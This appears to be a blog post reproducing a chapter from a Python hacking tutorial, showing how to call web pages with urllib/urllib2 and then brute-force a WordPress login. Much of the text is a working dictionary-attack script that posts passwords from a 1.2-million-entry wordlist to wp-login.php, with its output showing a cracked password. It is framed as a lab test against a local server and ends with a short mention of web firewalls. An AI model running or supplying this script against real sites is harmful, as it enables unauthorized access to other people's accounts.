Python
is similar to Java, PHP, and ASP in that a Web page can also be called when a
program runs. Python's strengths are that it can create a simple program with a
few lines of code. The ability to a web page from the application provides the
capability to automate various operations. First, let's learn the process to
call a web page with Python.
Figure 9-1 Python Web page Call Process
A Python application can call a web page in a
simple way by using the “urllib” and “urllib2” modules. “urllib” creates POST
messages in the same manner as "key1=value1&key2=value2". In
“urllib2”, you can create a “Request” object, wich returns a “Response” object
via a call to the Web server. The step-by-step procedure is as follows.
(1) Request Object: Using the “urllib”
module, you can create an HTTP Header and Body data. When you send a “GET”
method, a “Request” object is not created separately. Only the URL that is in
character when calling the HTTP transport module is delivered. However, you must
create a “Request” object when using the POST method with a change in the
Header value and a Cookie transfer.
(2) Transfering HTTP: The functions
provided by “urllib2” can be used to immediately call the URL without any
additional work for socket communication. The URL is passed as an argument, and
“Request” object is passed together if necessary. This function supports most
features that are provided by a browser to provide communication.
(3) Server PC: The URL points to a service
running on an Apache Web server on the server PC. The Apache Web server parses
the HTTP Header and Body and then invokes the desired service. The results are
then sent back to the hacker PC by creating an HTTP protocol format.
(4) Response Object: The response from the
web server is an HTTP protocol format. The “urllib2” module returns the
“Response” object that can be used in this application.
(5) Hacker PC: You can query the return URL,
HTTP status code, and the header information and data by using the functions
that “Response” object provides.
Hacking requires may require repetitive
tasks, so if you use a browser to hack a Web site directly, it is necessary to
repeatedly click while continuously changing the input values. However, if it
is possible to implement this process in a program, you can succeed with only a
few lines of code. Let's therefore learn how Python calls a Web page through
the following example.
import urllib
import urllib2
url = “http://server/wordpress/wp-login.php” #(1)
values = {‘log’:
‘python’, ‘pwd’: ‘python1’} #(2)
headers = {‘User-Agent’:
‘Mozilla/4.0(compatible;MISE
5.5; Windows NT)’} #(3)
data =
urllib.urlencode(values) #(4)
request =
urllib2.Request(url, data, headers) #(5)
response =
urllib2.urlopen(request) #(6)
print "#URL:%s" %
response.geturl() #(7)
print "#CODE:%s" %
response.getcode()
print "#INFO:%s"
%response.info()
print "#DATA:%s"
%response.read()
|
I
have entered the user name and the password in the WordPress login page. I deliberately
used the wrong password to obtain a simple response, which makes the analysis
simple.
(1)
Setting URL: Specify the access URL.
(2)
Setting Data: Specify the data in a
list form.
(3) Setting Header: It is possible to arbitrarily set the value of the
HTTP header. The type of browser that is used is originally set, but it can be
arbitrarily specified by the hacker. It is possible to place the cookie
information from the client here.
(4) Encoding Data: Set the value in the form that is used by the HTTP
protocol. The data changes in the “key1=value1&key2=value2”
form.
(5) Creating Request Object: The number of arguments can be changed when
creating the “Request” object. When you call a service with a simple URL, it
binds only the URL to the argument. If you want to transfer data, then place
the data into the argument.
(6) Calling a Web Page: The “urlopen” function calls the web page by
connecting the communication session, and it then returns a “Response” object
with the result. The “Response object is similar to a file.
(7) Printing Result: The required values in the “Response” object are
extracted and shown on the screen.
The
“urllib” and “urllib2” modules provided by Python have many features. For
example, when used with the “cookielib” module, they pass a cookie value to the
Web server to maintain the session. This enables the application to access the
sites that require authentication. The application can download a file while
maintaining the session and can upload the file necessary for the XSS attack.
#URL:http://server/wordpress/wp-login.php
#CODE:200
#INFO:Date: Thu, 10 Apr 2014 08:08:36 GMT
Server: Apache
Expires: Wed,
11 Jan 1984 05:00:00 GMT
Cache-Control:
no-cache, must-revalidate, max-age=0
Pragma:
no-cache
Set-Cookie:
wordpress_test_cookie=WP+Cookie+check; path=/wordpress/
X-Frame-Options:
SAMEORIGIN
Content-Length:
3925
Connection:
close
Content-Type:
text/html; charset=UTF-8
#DATA:<!DOCTYPE html>
<!--[if IE 8]>
<html
xmlns="http://www.w3.org/1999/xhtml" class="ie8"
lang="ko-KR">
<![endif]-->
<!--[if !(IE 8) ]><!-->
<html
xmlns="http://www.w3.org/1999/xhtml" lang="ko-KR">
<!--<![endif]-->
<head>
|
Now
let's learn how to conduct a Password Cracking attack. Basically, WordPress
does not check the number of times that a password error has occurred in its
login program. A hacker can therefore execute code that repeatedly enters
password information inside the applicatioin that calls the web page. First, we
obtain a data dictionary that supports various passwords. To this end, the
sqlmap module that you used before provides a wordlist.zip file.
Figure 9-3 wordlist.zip
After
extracting wordlist.zip, you can obtaine “wordlist.txt”. The file can be utilized
as a data dictionary to crack a password. The file has more than 1.2 million
passwords that are commonly used. This file occupies 10M or greater capacity
despite the fact that it only stores text.
!
! Keeper
!!
!!!
!!!!!!
!!!!!!!!!!!!!!!!!!!!
!!!!!2
!!!!lax7890
!!!!very8989
!!!111sssMMM
!!!234what
!!!666!!!
|
For
convenience during the hacking test, let's assume that we know the ID. It is
possible to find the ID through various means by using Google. Let's then make
a program that tries to repeatedly log in while reading the passwords from
wordlist.txt file one by one. We use “python” as the ID. Since the position for
“python” corresponding to the password is in the second half the wordlist.txt file,
let’s copy it to the front in order to immediately obtain the results.
Figure 9-5 Password Cracking Concept
To
make a program that automatically turns over the username and password to the
web server, you should know which variables store the username and password. In
this case, it is necessary to have basic knowledge of HTML and Javascript
Figure 9-6 HTML Code for the Login Page
If
you right-click on the sign-in page, you can select the “Source View (V)” menu.
The HTML code that is executed in the browser is shown above. You must know some
of the HTML tags and fields. First, the “action” field on the form tag
specifies the page that is to be called when it is sent. The “name” field of
the input tag indicates the names of the variables that store the user input,
and the username is stored in the “log” variable and the password is stored in the
“pwd” variable.
Let's
now create a full-fledged Python program.
import urllib import urllib2 url = “http://server/wordpress/wp-login.php” #(1) user_login = "python" #(2) wordlist = open('wordlist.txt', 'r') #(3) passwords = wordlist.readlines() for password in passwords: #(4) password = password.strip() values = { 'log': user_login, 'pwd': password } data = urllib.urlencode(values) request = urllib2.Request(url, data) response = urllib2.urlopen(request) try: idx = response.geturl().index('wp-admin') #(5) except: idx = 0 if (idx > 0): #(6) print "################success###########["+password+"]" break
else: print "################failed############["+password+"]" wordlist.close() |
The example now obtains the results by calling a Web page, the program execution time may take longer. If threads are used to handle the wordlist.txt file in parallel, it is possible to shorten the execution time. Since the purpose of this book is not to explain parallel programming, I will run this test as a single process.
(1) Setting URL: Specify the URL of the
target Web page.
(2) Setting ID: For testing, the ID is set
to “python”.
(3) Opening File: Open the text file that
has the password that is used for the test.
(4)
Starting Loop: Transmit the data stored in the file one-by-one and find the
password that matches with the user name
(5)
Checking Login: Once successfully logged in, Wordpress proceeds to the
admin screen. Therefore, check that it contains the address of the admin screen
in the return URL.
(6)
Ending Loop: If it contains the address of the administrator screen, it
will exit the loop. Otherwise, it will retry the login with the next entry.
I
moved the position of the “python” entry forward in the wordlist.txt file to
make this test more convenient.
################failed############[!]
################failed############[!
Keeper]
################failed############[!!]
################failed############[!!!]
################failed############[!!!!!!]
################failed############[!!!!!!!!!!!!!!!!!!!!]
################failed############[!!!!!2]
################success############[python]
|
Figure 9-7 Password Cracking Results
WordPress
can be easily hacked with more than 20 lines of Python code. Although these
attacks can be easily blocked by using security devices, such as web firewalls,
many sites are still vulnerable to rudimentary hacking procedures, such as
Password Cracking, due to a lack of security awareness.
No comments:
Post a Comment